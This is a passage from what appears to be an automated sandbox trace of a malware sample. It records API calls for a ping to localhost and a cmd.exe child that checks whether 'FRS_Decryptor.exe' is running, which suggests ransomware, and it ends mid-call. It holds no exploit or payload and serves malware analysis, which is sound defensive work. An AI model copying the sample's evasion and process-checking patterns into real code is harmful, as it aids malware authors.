(_FileHandle=1) returned 0x28 [0135.388] GetFileType (hFile=0x28) returned 0x2 [0135.388] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0135.388] GetLastError () returned 0x6 [0135.388] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✣") returned 0x0 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.388] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.388] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x837fd8 [0135.388] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x837fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _write (in: _FileHandle=1, _Buf=0x837fd8*, _MaxCharCount=0x16 | out: _Buf=0x837fd8*) returned 22 [0135.388] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.388] LocalFree (hMem=0x837fd8) returned 0x0 [0135.388] LocalFree (hMem=0x837fa0) returned 0x0 [0135.388] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="羠\x83ﱀQ⛿\x94䰨盪✼") returned 0x9 [0135.388] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.388] GetFileType (hFile=0x28) returned 0x2 [0135.388] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0135.388] GetLastError () returned 0x6 [0135.388] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✼") returned 0x0 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.388] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.388] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x828988 [0135.388] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x828988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _write (in: _FileHandle=1, _Buf=0x828988*, _MaxCharCount=0x9 | out: _Buf=0x828988*) returned 9 [0135.388] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.388] _fileno (_File=0x76ea4c28) returned 1 [0135.388] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.388] LocalFree (hMem=0x828988) returned 0x0 [0135.388] LocalFree (hMem=0x837fa0) returned 0x0 [0135.389] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x51f274, nSize=0x0, Arguments=0x51f270 | out: lpBuffer="羠\x83ﱀQ➷\x94䰨盪✧") returned 0x9 [0135.389] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.389] _fileno (_File=0x76ea4c28) returned 1 [0135.389] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.389] GetFileType (hFile=0x28) returned 0x2 [0135.389] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f238 | out: lpMode=0x51f238) returned 0 [0135.389] GetLastError () returned 0x6 [0135.389] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f19c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0135.389] _fileno (_File=0x76ea4c28) returned 1 [0135.389] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.389] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.389] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x828988 [0135.389] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x828988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0135.389] _fileno (_File=0x76ea4c28) returned 1 [0135.389] _write (in: _FileHandle=1, _Buf=0x828988*, _MaxCharCount=0x9 | out: _Buf=0x828988*) returned 9 [0135.389] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.389] _fileno (_File=0x76ea4c28) returned 1 [0135.389] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.389] LocalFree (hMem=0x828988) returned 0x0 [0135.389] LocalFree (hMem=0x837fa0) returned 0x0 [0135.389] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x51f270, nSize=0x0, Arguments=0x51f26c | out: lpBuffer="羠\x83ﱀQ⟘\x94䰨盪✨") returned 0x9 [0135.389] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.389] _fileno (_File=0x76ea4c28) returned 1 [0135.389] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.389] GetFileType (hFile=0x28) returned 0x2 [0135.390] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f234 | out: lpMode=0x51f234) returned 0 [0135.390] GetLastError () returned 0x6 [0135.390] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f198, nSize=0x50 | out: lpBuffer="Q✨") returned 0x0 [0135.390] _fileno (_File=0x76ea4c28) returned 1 [0135.390] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.390] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x828a48 [0135.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x828a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0135.390] _fileno (_File=0x76ea4c28) returned 1 [0135.390] _write (in: _FileHandle=1, _Buf=0x828a48*, _MaxCharCount=0x9 | out: _Buf=0x828a48*) returned 9 [0135.390] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.390] _fileno (_File=0x76ea4c28) returned 1 [0135.390] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.390] LocalFree (hMem=0x828a48) returned 0x0 [0135.390] LocalFree (hMem=0x837fa0) returned 0x0 [0135.390] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x51f1f8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0135.390] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x51f1cc, nSize=0x0, Arguments=0x51f1c8 | out: lpBuffer="羠\x83Q᧰\x94䰨盪❏") returned 0x5c [0135.390] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.390] _fileno (_File=0x76ea4c28) returned 1 [0135.390] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.390] GetFileType (hFile=0x28) returned 0x2 [0135.390] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f190 | out: lpMode=0x51f190) returned 0 [0135.390] GetLastError () returned 0x6 [0135.390] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f0f4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0135.390] _fileno (_File=0x76ea4c28) returned 1 [0135.390] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0135.390] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x838068 [0135.390] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x838068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0135.390] _fileno (_File=0x76ea4c28) returned 1 [0135.391] _write (in: _FileHandle=1, _Buf=0x838068*, _MaxCharCount=0x5c | out: _Buf=0x838068*) returned 92 [0135.391] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.391] _fileno (_File=0x76ea4c28) returned 1 [0135.391] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.391] LocalFree (hMem=0x838068) returned 0x0 [0135.391] LocalFree (hMem=0x837fa0) returned 0x0 [0135.391] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x51f1d8, nSize=0x0, Arguments=0x51f1d4 | out: lpBuffer="羠\x83Qᨧ\x94䰨盪❓") returned 0x61 [0135.391] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.391] _fileno (_File=0x76ea4c28) returned 1 [0135.391] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.391] GetFileType (hFile=0x28) returned 0x2 [0135.391] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x51f19c | out: lpMode=0x51f19c) returned 0 [0135.391] GetLastError () returned 0x6 [0135.391] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x51f100, nSize=0x50 | out: lpBuffer="Q❓") returned 0x0 [0135.391] _fileno (_File=0x76ea4c28) returned 1 [0135.391] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0135.391] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x838070 [0135.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x838070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0135.391] _fileno (_File=0x76ea4c28) returned 1 [0135.391] _write (in: _FileHandle=1, _Buf=0x838070*, _MaxCharCount=0x61 | out: _Buf=0x838070*) returned 97 [0135.391] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.391] _fileno (_File=0x76ea4c28) returned 1 [0135.391] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.391] LocalFree (hMem=0x838070) returned 0x0 [0135.391] LocalFree (hMem=0x837fa0) returned 0x0 [0135.391] IcmpCloseHandle (IcmpHandle=0x826c28) returned 1 [0135.392] LocalFree (hMem=0x82c160) returned 0x0 [0135.392] LocalFree (hMem=0x835270) returned 0x0 [0135.392] WSACleanup () returned 0 [0135.392] exit (_Code=0) Thread: id = 410 os_tid = 0xbb8 Thread: id = 411 os_tid = 0xba8 Process: id = "147" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6c77000" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7582 start_va = 0xa00000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 7583 start_va = 0xa20000 end_va = 0xa21fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 7584 start_va = 0xa30000 end_va = 0xa3efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 7585 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 7586 start_va = 0xa80000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 7587 start_va = 0xb80000 end_va = 0xb83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 7588 start_va = 0xb90000 end_va = 0xb90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 7589 start_va = 0xba0000 end_va = 0xba1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 7590 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7591 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7592 start_va = 0x7f4a0000 end_va = 0x7f4c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4a0000" filename = "" Region: id = 7593 start_va = 0x7f4c6000 end_va = 0x7f4c6fff entry_point = 0x0 region_type = private name = "private_0x000000007f4c6000" filename = "" Region: id = 7594 start_va = 0x7f4cc000 end_va = 0x7f4ccfff entry_point = 0x0 region_type = private name = "private_0x000000007f4cc000" filename = "" Region: id = 7595 start_va = 0x7f4cd000 end_va = 0x7f4cffff entry_point = 0x0 region_type = private name = "private_0x000000007f4cd000" filename = "" Region: id = 7596 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7597 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7598 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7599 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7600 start_va = 0xc70000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 7601 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7602 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7603 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7604 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 7605 start_va = 0xbb0000 end_va = 0xc2dfff entry_point = 0xbb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7606 start_va = 0xd30000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 7607 start_va = 0xf90000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 7608 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7609 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7610 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7611 start_va = 0x7f3a0000 end_va = 0x7f49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3a0000" filename = "" Region: id = 7612 start_va = 0xa10000 end_va = 0xa13fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 7613 start_va = 0xfa0000 end_va = 0x1274fff entry_point = 0xfa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7632 start_va = 0xa20000 end_va = 0xa23fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Thread: id = 412 os_tid = 0xbf8 [0135.427] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0135.428] __set_app_type (_Type=0x1) [0135.428] __p__fmode () returned 0x76ea1768 [0135.428] __p__commode () returned 0x76ea176c [0135.428] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0135.428] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0135.428] GetCurrentThreadId () returned 0xbf8 [0135.428] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbf8) returned 0x34 [0135.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0135.428] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0135.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.430] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.430] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xb7fa88 | out: phkResult=0xb7fa88*=0x0) returned 0x2 [0135.431] VirtualQuery (in: lpAddress=0xb7fa97, lpBuffer=0xb7fa30, dwLength=0x1c | out: lpBuffer=0xb7fa30*(BaseAddress=0xb7f000, AllocationBase=0xa80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.431] VirtualQuery (in: lpAddress=0xa80000, lpBuffer=0xb7fa30, dwLength=0x1c | out: lpBuffer=0xb7fa30*(BaseAddress=0xa80000, AllocationBase=0xa80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.431] VirtualQuery (in: lpAddress=0xa81000, lpBuffer=0xb7fa30, dwLength=0x1c | out: lpBuffer=0xb7fa30*(BaseAddress=0xa81000, AllocationBase=0xa80000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.431] VirtualQuery (in: lpAddress=0xa83000, lpBuffer=0xb7fa30, dwLength=0x1c | out: lpBuffer=0xb7fa30*(BaseAddress=0xa83000, AllocationBase=0xa80000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.431] VirtualQuery (in: lpAddress=0xb80000, lpBuffer=0xb7fa30, dwLength=0x1c | out: lpBuffer=0xb7fa30*(BaseAddress=0xb80000, AllocationBase=0xb80000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.431] GetConsoleOutputCP () returned 0x1b5 [0135.431] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0135.431] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0135.432] _get_osfhandle (_FileHandle=1) returned 0x154 [0135.432] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0135.432] _get_osfhandle (_FileHandle=1) returned 0x154 [0135.432] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0135.432] _get_osfhandle (_FileHandle=0) returned 0x24 [0135.432] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0135.432] GetEnvironmentStringsW () returned 0xd340c0* [0135.432] FreeEnvironmentStringsA (penv="=") returned 1 [0135.432] GetEnvironmentStringsW () returned 0xd340c0* [0135.432] FreeEnvironmentStringsA (penv="=") returned 1 [0135.432] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb7e9d8 | out: phkResult=0xb7e9d8*=0x44) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x0, lpData=0xb7e9e4*=0x3c, lpcbData=0xb7e9dc*=0x1000) returned 0x2 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x1, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x0, lpData=0xb7e9e4*=0x1, lpcbData=0xb7e9dc*=0x1000) returned 0x2 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x0, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x40, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x40, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x0, lpData=0xb7e9e4*=0x40, lpcbData=0xb7e9dc*=0x1000) returned 0x2 [0135.433] RegCloseKey (hKey=0x44) returned 0x0 [0135.433] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb7e9d8 | out: phkResult=0xb7e9d8*=0x44) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x0, lpData=0xb7e9e4*=0x40, lpcbData=0xb7e9dc*=0x1000) returned 0x2 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x1, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x0, lpData=0xb7e9e4*=0x1, lpcbData=0xb7e9dc*=0x1000) returned 0x2 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x0, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x9, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x4, lpData=0xb7e9e4*=0x9, lpcbData=0xb7e9dc*=0x4) returned 0x0 [0135.433] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb7e9e0, lpData=0xb7e9e4, lpcbData=0xb7e9dc*=0x1000 | out: lpType=0xb7e9e0*=0x0, lpData=0xb7e9e4*=0x9, lpcbData=0xb7e9dc*=0x1000) returned 0x2 [0135.433] RegCloseKey (hKey=0x44) returned 0x0 [0135.433] time (in: timer=0x0 | out: 